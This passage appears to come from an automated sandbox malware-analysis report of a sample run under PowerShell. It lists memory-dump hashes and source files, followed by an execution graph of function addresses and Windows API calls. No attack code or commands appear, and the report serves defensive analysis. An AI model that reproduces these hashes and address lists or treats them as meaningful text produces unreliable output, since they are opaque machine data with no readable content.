                                                          • API String ID:
                                                          • Opcode ID: eaa91b13e7624b2b98a65ea90c7775d494086af9760b1baf75b9f3ca1aa51248
                                                          • Instruction ID: 1458b82bc0f5f627abd982da8efe47c1d874d6082b7050bf44d4b0b5dee2bc05
                                                          • Opcode Fuzzy Hash: eaa91b13e7624b2b98a65ea90c7775d494086af9760b1baf75b9f3ca1aa51248
                                                          • Instruction Fuzzy Hash: 072108B8A002099FCB14DF98C9809AAFBF1FF49310B128599E919EB355D735FD41CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 612346a163a8647d1f4da2dad80c9b33834df9e2d410d18370b1073c77ed6a82
                                                          • Instruction ID: ea2a74d3e10a41b340312dd764f177c78f59d8da871565c24ddb01bfa18a031a
                                                          • Opcode Fuzzy Hash: 612346a163a8647d1f4da2dad80c9b33834df9e2d410d18370b1073c77ed6a82
                                                          • Instruction Fuzzy Hash: A711FE74A04218EFDB55DB98D884A9DFBF1BF49314F298558E404AB361C771ED82CF50
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707037377.00000000034ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 034ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_34ed000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d1484b2eaf9e8c24b1a97428a467e83b27dd72f40b871f1bf5339bc3d3ac5336
                                                          • Instruction ID: ebbfd2b403db986c2561b09736cdb1e5e14f19c7de445881cce67492a34207cd
                                                          • Opcode Fuzzy Hash: d1484b2eaf9e8c24b1a97428a467e83b27dd72f40b871f1bf5339bc3d3ac5336
                                                          • Instruction Fuzzy Hash: 8B012D6240E3C09EE7128B25CC94B52BFB4DF57229F1D80DBD8888F2A7C2695848C772
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707037377.00000000034ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 034ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_34ed000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25c9c5d20b77008ce180b956e2661928db9fe9135e68573b0b411f481d9991d2
                                                          • Instruction ID: 7c7b235d88777c7a6f7ee0cc98a661abf3d3274effa06548232025ce8c38844d
                                                          • Opcode Fuzzy Hash: 25c9c5d20b77008ce180b956e2661928db9fe9135e68573b0b411f481d9991d2
                                                          • Instruction Fuzzy Hash: 0801D4718043409EE720DA15CC84B67BF98DF5232BF0CC45AEC180E246C6799842C6B5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 182fe1cf9582fa368265bf7f797050f72ae3a512c805b6ba093ee4d250c4b0cb
                                                          • Instruction ID: 5c9d4bb68c98e381bbe72cf3f0f3390dc6db5f79dd3a2731bb7b3b9efb84bcc1
                                                          • Opcode Fuzzy Hash: 182fe1cf9582fa368265bf7f797050f72ae3a512c805b6ba093ee4d250c4b0cb
                                                          • Instruction Fuzzy Hash: 9CE0EDB4E0420A9F8B48DFA8A4511BEBFF5AB48200F10856EE829E7340EA3559418FD5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 003bd265ef33539cf07b7a184f4618af4d0290cbd19a48e71c146f9ce936b448
                                                          • Instruction ID: 64e495370d6b4682c43aaa9c9abf0d014f3ad2d9c6d2daeda65fabe8d611c597
                                                          • Opcode Fuzzy Hash: 003bd265ef33539cf07b7a184f4618af4d0290cbd19a48e71c146f9ce936b448
                                                          • Instruction Fuzzy Hash: FDE026B4E1420E9F8F48DFB995421BEFBF5AB48200F10856E9919E3340E63856518F95
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2c47baddaa7478ee1fa16875935df86d21e8f59f0a04355a6b67f52a6f2ecd7c
                                                          • Instruction ID: d820a51d4b43f455fc8d53c449db50ca6546731cc59c3d006eeb67493d8bf997
                                                          • Opcode Fuzzy Hash: 2c47baddaa7478ee1fa16875935df86d21e8f59f0a04355a6b67f52a6f2ecd7c
                                                          • Instruction Fuzzy Hash: EFD0A77154D74587C3314364A9093A53B547B00210F040055E24D07683AE0674C582D2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fc3af4606490a8ee9335fb100d9b2838b9417e5a34bfb39bc50dd700bd5cc9dd
                                                          • Instruction ID: d0aa1d5429c93de957c8db5ec7bffab7a13eb40ad8e1d5e8a31cfaec74a9c73c
                                                          • Opcode Fuzzy Hash: fc3af4606490a8ee9335fb100d9b2838b9417e5a34bfb39bc50dd700bd5cc9dd
                                                          • Instruction Fuzzy Hash: F1212D1120ABC5BEF70757B8692D2992F768FC6760F0E4EC3D4A0975D3EC268558C3A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1716023511.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7cb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                          • API String ID: 0-2392861976
                                                          • Opcode ID: af0fa75ea136a9959df1e5114c0b5ff513ce77e81ea00f663247d907d481ac57
                                                          • Instruction ID: a3ba029d5bf246a016fc360e7f9f29e77098f662b4dc52a27823b45fcd8b8e40
                                                          • Opcode Fuzzy Hash: af0fa75ea136a9959df1e5114c0b5ff513ce77e81ea00f663247d907d481ac57
                                                          • Instruction Fuzzy Hash: 6C314BF1B0021E8FCB345E7A88A06E7BBE6AB85611F1C846FE8058B205EF31D644C791
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1716023511.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7cb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $^q$$^q$$^q$$^q
                                                          • API String ID: 0-2125118731
                                                          • Opcode ID: 2b4b42e0498c29ee38c464d215dc3b344cbace4b47b3af01a8ff95cdcfb754c5
                                                          • Instruction ID: 1dd45f4ab59d3e8ea0f8ac2e2f7bb55bf3385b6a7edd730cb45c4b1a19f8c2e4
                                                          • Opcode Fuzzy Hash: 2b4b42e0498c29ee38c464d215dc3b344cbace4b47b3af01a8ff95cdcfb754c5
                                                          • Instruction Fuzzy Hash: 9A21DBF1A0434EDFDB354F6585A06E67FF1AF42611F1C44EBE8448B146EB319644C791
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1716023511.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7cb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q$$^q$$^q
                                                          • API String ID: 0-2049395529
                                                          • Opcode ID: 428fc1b0c52480fff56af801a1489b91734e81590339ae8e5f25689e165398c2
                                                          • Instruction ID: 214d746baabdecbd4908dd497c53ad0798ec81fe6954c787324630e6e571f6c7
                                                          • Opcode Fuzzy Hash: 428fc1b0c52480fff56af801a1489b91734e81590339ae8e5f25689e165398c2
                                                          • Instruction Fuzzy Hash: 08F028607083AA8FCB3A066918645EB5FB65FC2A11B29459BE041DF286CE218DC5C393

                                                          Execution Graph

                                                          Execution Coverage:3.6%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:19.7%
                                                          Total number of Nodes:1086
                                                          Total number of Limit Nodes:71
7ff738afa0ec 98 API calls 3 library calls 80744->80763 80759 7ff738a71750 80746->80759 80748 7ff738a71a05 80749 7ff738ae9230 swprintf 8 API calls 80748->80749 80750 7ff738a71a3d 80749->80750 80750->80714 80751 7ff738a719cd 80751->80748 80752 7ff738a71750 98 API calls 80751->80752 80752->80751 80753->80711 80754->80714 80755->80716 80756->80717 80757->80707 80758->80710 80760 7ff738a71763 80759->80760 80762 7ff738a7176f 80759->80762 80760->80762 80764 7ff738afa0ec 98 API calls 3 library calls 80760->80764 80762->80751 80763->80746 80764->80762 80765 7ff738af93b0 80766 7ff738af93c0 80765->80766 80769 7ff738af93c9 80765->80769 80766->80769 80771 7ff738af946c 80766->80771 80772 7ff738af9485 80771->80772 80785 7ff738af93d2 80771->80785 80787 7ff738b022fc 80772->80787 80774 7ff738af948a 80791 7ff738b0964c GetEnvironmentStringsW 80774->80791 80777 7ff738af94a3 80812 7ff738af9610 59 API calls 4 library calls 80777->80812 80778 7ff738af9497 80811 7ff738b02e14 11 API calls 2 library calls 80778->80811 80781 7ff738af94ab 80813 7ff738b02e14 11 API calls 2 library calls 80781->80813 80783 7ff738af94ca 80814 7ff738b02e14 11 API calls 2 library calls 80783->80814 80785->80769 80786 7ff738af983c 80 API calls 3 library calls 80785->80786 80786->80769 80788 7ff738b02309 80787->80788 80790 7ff738b02338 wcsftime 80787->80790 80815 7ff738b01a9c 64 API calls 3 library calls 80788->80815 80790->80774 80792 7ff738b0967c 80791->80792 80793 7ff738af948f 80791->80793 80816 7ff738b0959c WideCharToMultiByte 80792->80816 80793->80777 80793->80778 80795 7ff738b096cd 80796 7ff738b096d4 FreeEnvironmentStringsW 80795->80796 80797 7ff738b039a0 wcsftime 12 API calls 80795->80797 80796->80793 80798 7ff738b096e7 80797->80798 80799 7ff738b096f8 80798->80799 80800 7ff738b096ef 80798->80800 80801 7ff738b0959c wcsftime WideCharToMultiByte 80799->80801 80802 7ff738b02e14 __free_lconv_mon 11 API calls 80800->80802 80803 7ff738b0971b 80801->80803 80804 7ff738b096f6 80802->80804 80805 7ff738b09729 80803->80805 
80806 7ff738b0971f 80803->80806 80804->80796 80808 7ff738b02e14 __free_lconv_mon 11 API calls 80805->80808 80807 7ff738b02e14 __free_lconv_mon 11 API calls 80806->80807 80809 7ff738b09727 FreeEnvironmentStringsW 80807->80809 80808->80809 80809->80793 80811->80785 80812->80781 80813->80783 80814->80785 80815->80790 80817 7ff738a7e4d0 80818 7ff738a7e503 80817->80818 80821 7ff738a7e57f 80817->80821 80824 7ff738a7e662 80818->80824 80825 7ff738a7e520 80818->80825 80830 7ff738a7e623 80818->80830 80889 7ff738a7e642 80818->80889 80819 7ff738a7e637 80828 7ff738a7e895 80819->80828 80819->80889 80943 7ff738a594d0 100 API calls 80819->80943 80820 7ff738ae9230 swprintf 8 API calls 80823 7ff738a7e91a 80820->80823 80821->80889 80910 7ff738a58f50 135 API calls swprintf 80821->80910 80822 7ff738a7e6e5 80911 7ff738a814a0 194 API calls 80822->80911 80826 7ff738ae9230 swprintf 8 API calls 80824->80826 80825->80889 80890 7ff738a59d00 80825->80890 80852 7ff738a7e5b9 80826->80852 80956 7ff738a66840 135 API calls swprintf 80828->80956 80829 7ff738a7e72b 80829->80819 80834 7ff738a7e732 80829->80834 80830->80819 80830->80822 80830->80829 80842 7ff738a7e749 80834->80842 80854 7ff738a7e7e3 80834->80854 80837 7ff738a7e7a2 80841 7ff738a7e8fc 80837->80841 80869 7ff738a7e7aa 80837->80869 80838 7ff738a7e8a5 80843 7ff738a7e8b8 80838->80843 80957 7ff738a59f30 MessageBoxA 80838->80957 80840 7ff738ae9230 swprintf 8 API calls 80840->80830 80841->80889 80962 7ff738a59f20 MessageBeep 80841->80962 80917 7ff738a594d0 100 API calls 80842->80917 80848 7ff738a68690 136 API calls 80843->80848 80845 7ff738a7e541 80851 7ff738a7e572 80845->80851 80903 7ff738a59210 80845->80903 80855 7ff738a7e8cf 80848->80855 80849 7ff738a7e6f8 80849->80889 80912 7ff738a6e760 80849->80912 80858 7ff738ae9230 swprintf 8 API calls 80851->80858 80852->80840 80853 7ff738a7e751 80853->80841 80857 7ff738a7e759 80853->80857 80859 7ff738a7e8f4 80854->80859 80864 7ff738a6e760 98 API calls 80854->80864 80854->80889 80856 7ff738a68690 136 API 
calls 80855->80856 80860 7ff738a7e8d9 80856->80860 80918 7ff738a68d80 136 API calls 80857->80918 80858->80821 80862 7ff738a6e760 98 API calls 80859->80862 80958 7ff738a59f60 80860->80958 80862->80841 80865 7ff738a7e80c 80864->80865 80865->80859 80944 7ff738a58ad0 98 API calls 80865->80944 80867 7ff738a7e76e 80919 7ff738a68690 80867->80919 80868 7ff738a7e8e5 80872 7ff738a59f60 SetWindowTextA 80868->80872 80952 7ff738a76a00 80869->80952 80872->80889 80874 7ff738a7e778 80876 7ff738a68690 136 API calls 80874->80876 80875 7ff738a7e821 80875->80859 80877 7ff738a7e829 80875->80877 80878 7ff738a7e782 80876->80878 80945 7ff738a6cdf0 80877->80945 80878->80868 80882 7ff738a7e849 80883 7ff738a7e936 80882->80883 80885 7ff738a6e760 98 API calls 80882->80885 80963 7ff738a59f20 MessageBeep 80883->80963 80886 7ff738a7e864 80885->80886 80886->80883 80887 7ff738a7e86c 80886->80887 80951 7ff738a6cf80 134 API calls 80887->80951 80889->80820 80891 7ff738a59d45 80890->80891 80893 7ff738a59d0f 80890->80893 80896 7ff738a59140 80891->80896 80892 7ff738a71980 98 API calls 80892->80893 80893->80891 80893->80892 80894 7ff738a59d47 80893->80894 80894->80891 80895 7ff738a59d4f SendDlgItemMessageA 80894->80895 80895->80891 80901 7ff738a59154 80896->80901 80902 7ff738a59185 80896->80902 80897 7ff738a71980 98 API calls 80897->80901 80899 7ff738a591a0 SendDlgItemMessageA 80899->80845 80901->80897 80901->80902 80902->80899 80964 7ff738afa0ec 98 API calls 3 library calls 80902->80964 80907 7ff738a59229 80903->80907 80909 7ff738a59266 80903->80909 80905 7ff738a71980 98 API calls 80905->80907 80906 7ff738a59281 SendDlgItemMessageA 80906->80845 80907->80905 80907->80909 80909->80906 80965 7ff738afa0ec 98 API calls 3 library calls 80909->80965 80910->80852 80911->80849 80966 7ff738a6d200 80912->80966 80917->80853 80918->80867 80920 7ff738a686a3 80919->80920 80923 7ff738a686de 80919->80923 80921 7ff738a6fd50 134 API calls 80920->80921 80922 7ff738a686a8 80921->80922 80934 7ff738a686b4 80922->80934 80996 
7ff738a68e00 80922->80996 80923->80874 80926 7ff738a68751 81005 7ff738a6ecc0 8 API calls swprintf 80926->81005 80929 7ff738a68749 81004 7ff738a689a0 RegCloseKey 80929->81004 80932 7ff738a6871d 80932->80929 81002 7ff738a6ecc0 8 API calls swprintf 80932->81002 81003 7ff738a68e60 135 API calls 80932->81003 80933 7ff738a6f680 134 API calls 80936 7ff738a687d1 80933->80936 80934->80933 80942 7ff738afdd02 80936->80942 81006 7ff738af8ec8 11 API calls _get_daylight 80936->81006 80938 7ff738afdcf7 81007 7ff738b02f2c 59 API calls _invalid_parameter_noinfo 80938->81007 80940 7ff738ae9230 swprintf 8 API calls 80941 7ff738afe0c0 80940->80941 80941->80874 80942->80940 80943->80837 80944->80875 80946 7ff738a6f680 134 API calls 80945->80946 80947 7ff738a6ce07 80946->80947 80948 7ff738a70bc0 134 API calls 80947->80948 80949 7ff738a6ce16 80948->80949 80950 7ff738a814a0 194 API calls 80949->80950 80950->80882 80951->80889 80953 7ff738a76a0b 80952->80953 80955 7ff738a76a26 80952->80955 80954 7ff738a6f680 134 API calls 80953->80954 80954->80955 80955->80828 80956->80838 80959 7ff738a59f6f 80958->80959 80960 7ff738a5a007 80959->80960 80961 7ff738a59ff9 SetWindowTextA 80959->80961 80960->80868 80961->80959 80964->80899 80965->80906 80967 7ff738a6d24a 80966->80967 80968 7ff738a6d231 80966->80968 80970 7ff738a6d26a 80967->80970 80991 7ff738afa0ec 98 API calls 3 library calls 80967->80991 80990 7ff738afa0ec 98 API calls 3 library calls 80968->80990 80972 7ff738a71980 98 API calls 80970->80972 80973 7ff738a6d27e 80972->80973 80974 7ff738a6d29f 80973->80974 80992 7ff738afa0ec 98 API calls 3 library calls 80973->80992 80976 7ff738ae9230 swprintf 8 API calls 80974->80976 80977 7ff738a6d2af 80976->80977 80978 7ff738a6d390 80977->80978 80979 7ff738a6d3da 80978->80979 80980 7ff738a6d3c1 80978->80980 80981 7ff738a6d3fa 80979->80981 80994 7ff738afa0ec 98 API calls 3 library calls 80979->80994 80993 7ff738afa0ec 98 API calls 3 library calls 80980->80993 80984 7ff738a71980 98 API calls 80981->80984 
80985 7ff738a6d40e 80984->80985 80986 7ff738a6d42f 80985->80986 80995 7ff738afa0ec 98 API calls 3 library calls 80985->80995 80988 7ff738ae9230 swprintf 8 API calls 80986->80988 80989 7ff738a6d440 80988->80989 80989->80889 80990->80967 80991->80970 80992->80974 80993->80979 80994->80981 80995->80986 81008 7ff738a72ce0 80996->81008 80999 7ff738a6870a 80999->80926 81001 7ff738a68e60 135 API calls 80999->81001 81000 7ff738a6f680 134 API calls 81000->80999 81001->80932 81002->80932 81003->80932 81005->80934 81006->80938 81007->80942 81009 7ff738a72dfc 81008->81009 81014 7ff738a72d18 81008->81014 81010 7ff738ae9230 swprintf 8 API calls 81009->81010 81011 7ff738a68e28 81010->81011 81011->80999 81011->81000 81012 7ff738a72d7e RegCreateKeyExA 81012->81014 81015 7ff738a72db4 81012->81015 81013 7ff738a72dc0 RegOpenKeyExA 81013->81014 81013->81015 81014->81009 81014->81012 81014->81013 81016 7ff738a72de2 RegCloseKey 81014->81016 81015->81009 81017 7ff738a72df3 RegCloseKey 81015->81017 81016->81014 81017->81009 81018 7ff738a82550 81019 7ff738a82596 81018->81019 81020 7ff738a82585 GetWindowLongPtrA 81018->81020 81023 7ff738a52220 81019->81023 81020->81019 81024 7ff738a526a9 81023->81024 81025 7ff738a5225f 81023->81025 81026 7ff738a52a0e 81024->81026 81035 7ff738a526d3 SendMessageA SendMessageA SendMessageA 81024->81035 81027 7ff738a5226e 81025->81027 81028 7ff738a527ef 81025->81028 81029 7ff738ae9230 swprintf 8 API calls 81026->81029 81030 7ff738a5227b 81027->81030 81031 7ff738a5285f 81027->81031 81028->81026 81033 7ff738a5280a KillTimer 81028->81033 81032 7ff738a52a1e 81029->81032 81086 7ff738a53fa0 81030->81086 81147 7ff738a54020 154 API calls swprintf 81031->81147 81145 7ff738a73280 188 API calls swprintf 81033->81145 81064 7ff738a52751 81035->81064 81039 7ff738a5286f 81042 7ff738ae9230 swprintf 8 API calls 81039->81042 81041 7ff738a52827 81044 7ff738a5282c MessageBoxA 81041->81044 81047 7ff738a52850 81041->81047 81045 7ff738a52882 81042->81045 81043 7ff738a52a34 81046 
7ff738a546a0 11 API calls 81043->81046 81044->81047 81045->81032 81067 7ff738a52a70 81046->81067 81146 7ff738a825c0 GetWindowLongPtrA 81047->81146 81049 7ff738a5285a 81049->81026 81051 7ff738a5232c LoadIconA SendMessageA 81130 7ff738a83c00 GetDesktopWindow GetWindowRect 81051->81130 81052 7ff738a527d8 GetDlgItem 81053 7ff738a527e7 DestroyWindow 81052->81053 81052->81064 81053->81064 81054 7ff738a522ba 81054->81051 81096 7ff738a55b90 81054->81096 81058 7ff738a52ad8 81060 7ff738a59f60 SetWindowTextA 81058->81060 81062 7ff738a52ae2 SendMessageA InvalidateRect SetFocus 81060->81062 81061 7ff738a528c1 SendMessageA 81063 7ff738a528d8 81061->81063 81062->81026 81148 7ff738afa0ec 98 API calls 3 library calls 81063->81148 81064->81043 81064->81052 81143 7ff738a55950 99 API calls 81064->81143 81144 7ff738a55af0 98 API calls 81064->81144 81065 7ff738a55b90 140 API calls 81065->81067 81067->81058 81067->81065 81068 7ff738a5288a SendMessageA 81069 7ff738a528f1 81068->81069 81070 7ff738a528bf 81068->81070 81071 7ff738a546a0 11 API calls 81069->81071 81070->81063 81079 7ff738a52923 81071->81079 81073 7ff738a52988 81074 7ff738a59f60 SetWindowTextA 81073->81074 81076 7ff738a52992 81074->81076 81075 7ff738a524f9 memcpy_s swprintf 81075->81068 81080 7ff738a52634 SendMessageA 81075->81080 81142 7ff738afa0ec 98 API calls 3 library calls 81075->81142 81078 7ff738a5299c SetTimer 81076->81078 81083 7ff738a529b3 81076->81083 81077 7ff738a55b90 140 API calls 81077->81079 81078->81083 81079->81073 81079->81077 81080->81075 81081 7ff738a5266f SendMessageA 81080->81081 81081->81075 81082 7ff738a529f8 ShowWindow 81082->81026 81083->81082 81085 7ff738a529ee 81083->81085 81136 7ff738a59e30 81083->81136 81085->81082 81087 7ff738a53fbe 81086->81087 81088 7ff738a53fb5 SetWindowTextA 81086->81088 81089 7ff738a53fc7 GetWindowLongPtrA SetWindowLongPtrA 81087->81089 81090 7ff738a53ff2 GetDlgItem 81087->81090 81088->81087 81089->81090 81091 7ff738a52286 81090->81091 81092 7ff738a54005 DestroyWindow 
81090->81092 81093 7ff738a546a0 SendMessageA GetClientRect MapDialogRect 81091->81093 81092->81091 81094 7ff738ae9230 swprintf 8 API calls 81093->81094 81095 7ff738a5473f 81094->81095 81095->81054 81149 7ff738a83d50 81096->81149 81099 7ff738a55c66 81100 7ff738a6f680 134 API calls 81099->81100 81105 7ff738a55db2 81099->81105 81102 7ff738a55cc2 81100->81102 81101 7ff738a6f680 134 API calls 81103 7ff738a55c0b 81101->81103 81104 7ff738a76a00 134 API calls 81102->81104 81106 7ff738a70ca0 134 API calls 81103->81106 81107 7ff738a55ce2 81104->81107 81113 7ff738afa0ec 98 API calls 81105->81113 81120 7ff738a57a5a 81105->81120 81126 7ff738a57904 81105->81126 81108 7ff738a55c48 81106->81108 81109 7ff738a55d21 81107->81109 81111 7ff738a70ca0 134 API calls 81107->81111 81108->81099 81154 7ff738afa0ec 98 API calls 3 library calls 81108->81154 81112 7ff738a70ca0 134 API calls 81109->81112 81114 7ff738a55d03 81111->81114 81115 7ff738a55d32 81112->81115 81113->81105 81114->81109 81155 7ff738afa0ec 98 API calls 3 library calls 81114->81155 81118 7ff738a55d50 81115->81118 81156 7ff738afa0ec 98 API calls 3 library calls 81115->81156 81116 7ff738a579e9 81117 7ff738ae9230 swprintf 8 API calls 81116->81117 81119 7ff738a579fd 81117->81119 81123 7ff738a54750 4 API calls 81118->81123 81119->81054 81157 7ff738afa0ec 98 API calls 3 library calls 81120->81157 81123->81105 81124 7ff738a54750 4 API calls 81124->81116 81126->81116 81126->81124 81127 7ff738a57a73 81158 7ff738a37d20 100 API calls swprintf 81127->81158 81129 7ff738a57a78 81131 7ff738a83c9c 81130->81131 81132 7ff738a83c31 GetWindowRect 81130->81132 81134 7ff738ae9230 swprintf 8 API calls 81131->81134 81132->81131 81133 7ff738a83c43 MoveWindow 81132->81133 81133->81131 81135 7ff738a52361 8 API calls 81134->81135 81135->81061 81135->81075 81137 7ff738a59e75 81136->81137 81139 7ff738a59e3f 81136->81139 81137->81082 81138 7ff738a71980 98 API calls 81138->81139 81139->81137 81139->81138 81140 7ff738a59e7f GetDlgItem SetFocus 81139->81140 
81142->81075 81143->81064 81144->81064 81145->81041 81146->81049 81147->81039 81148->81069 81150 7ff738a55be3 81149->81150 81151 7ff738a83d63 81149->81151 81150->81099 81150->81101 81150->81105 81151->81150 81152 7ff738a6f680 134 API calls 81151->81152 81153 7ff738a83d99 81152->81153 81154->81099 81155->81109 81156->81118 81157->81127 81158->81129 81159 7ff738a7e950 81160 7ff738a7e999 81159->81160 81161 7ff738a7e966 81159->81161 81188 7ff738a58f50 135 API calls swprintf 81160->81188 81162 7ff738a7e9cc 81161->81162 81164 7ff738a6d200 98 API calls 81161->81164 81166 7ff738a7e978 81164->81166 81165 7ff738a7e9a4 81167 7ff738a6d200 98 API calls 81165->81167 81169 7ff738a7e97d 81166->81169 81170 7ff738a7e9e4 81166->81170 81168 7ff738a7e9b4 81167->81168 81189 7ff738a6de80 81168->81189 81173 7ff738a59820 100 API calls 81169->81173 81177 7ff738a59820 81170->81177 81174 7ff738a7e98f 81173->81174 81175 7ff738a6d390 98 API calls 81174->81175 81176 7ff738a7ea00 81175->81176 81178 7ff738a59875 81177->81178 81180 7ff738a5983c 81177->81180 81192 7ff738afa0ec 98 API calls 3 library calls 81178->81192 81180->81178 81181 7ff738a5988e 81180->81181 81182 7ff738a71980 98 API calls 81180->81182 81183 7ff738a598a2 81181->81183 81193 7ff738afa0ec 98 API calls 3 library calls 81181->81193 81182->81180 81185 7ff738a59937 81194 7ff738a37d20 100 API calls swprintf 81185->81194 81187 7ff738a5993c 81188->81165 81195 7ff738a6dd80 81189->81195 81192->81181 81193->81185 81194->81187 81196 7ff738a6dda7 81195->81196 81200 7ff738a6ddc0 81195->81200 81213 7ff738afa0ec 98 API calls 3 library calls 81196->81213 81198 7ff738a6de6b 81198->81162 81199 7ff738a6ddf0 81201 7ff738a6f680 134 API calls 81199->81201 81200->81198 81200->81199 81214 7ff738afa0ec 98 API calls 3 library calls 81200->81214 81203 7ff738a6de02 81201->81203 81204 7ff738a76a00 134 API calls 81203->81204 81205 7ff738a6de0f 81204->81205 81206 7ff738a70ca0 134 API calls 81205->81206 81207 7ff738a6de22 81206->81207 81207->81198 81215 
7ff738a722e0 98 API calls swprintf 81207->81215 81209 7ff738a6de3a 81210 7ff738a70ca0 134 API calls 81209->81210 81211 7ff738a6de4d 81210->81211 81211->81198 81216 7ff738afa0ec 98 API calls 3 library calls 81211->81216 81213->81200 81214->81199 81215->81209 81216->81198 81217 7ff738a7eb70 81218 7ff738a6d200 98 API calls 81217->81218 81219 7ff738a7eb99 81218->81219 81220 7ff738a7ec3a 81219->81220 81221 7ff738a7eba8 81219->81221 81223 7ff738a7ec48 81220->81223 81224 7ff738a7ed1f 81220->81224 81222 7ff738a7ed5c 81221->81222 81225 7ff738a7ebbb 81221->81225 81226 7ff738a7ed61 81221->81226 81223->81222 81227 7ff738a59d00 99 API calls 81223->81227 81224->81222 81297 7ff738a58b30 99 API calls 81224->81297 81225->81222 81272 7ff738a58be0 101 API calls 81225->81272 81226->81222 81279 7ff738a594d0 100 API calls 81226->81279 81229 7ff738a7ec5d 81227->81229 81233 7ff738a59140 99 API calls 81229->81233 81231 7ff738a7ed76 81231->81222 81280 7ff738a59410 99 API calls 81231->81280 81235 7ff738a7ec68 81233->81235 81234 7ff738a7ebd9 81239 7ff738a7ebfd 81234->81239 81273 7ff738afa0ec 98 API calls 3 library calls 81234->81273 81237 7ff738a7ec92 81235->81237 81276 7ff738afa0ec 98 API calls 3 library calls 81235->81276 81242 7ff738a7ecf6 81237->81242 81244 7ff738a7ecff 81237->81244 81265 7ff738a592f0 81237->81265 81238 7ff738a7ed8c 81281 7ff738a58b30 99 API calls 81238->81281 81253 7ff738a7ec33 81239->81253 81274 7ff738a594d0 100 API calls 81239->81274 81242->81244 81277 7ff738a596b0 99 API calls 81244->81277 81249 7ff738a7ec1c 81249->81222 81275 7ff738a59410 99 API calls 81249->81275 81250 7ff738a7ed0f 81278 7ff738a59d80 101 API calls 81250->81278 81253->81222 81282 7ff738a6db90 81253->81282 81254 7ff738a7ed1a 81254->81222 81255 7ff738a7edbb 81256 7ff738a7edee 81255->81256 81295 7ff738afa0ec 98 API calls 3 library calls 81255->81295 81258 7ff738a7ee0c 81256->81258 81296 7ff738afa0ec 98 API calls 3 library calls 81256->81296 81260 7ff738a6d200 98 API calls 81258->81260 81261 7ff738a7ee19 
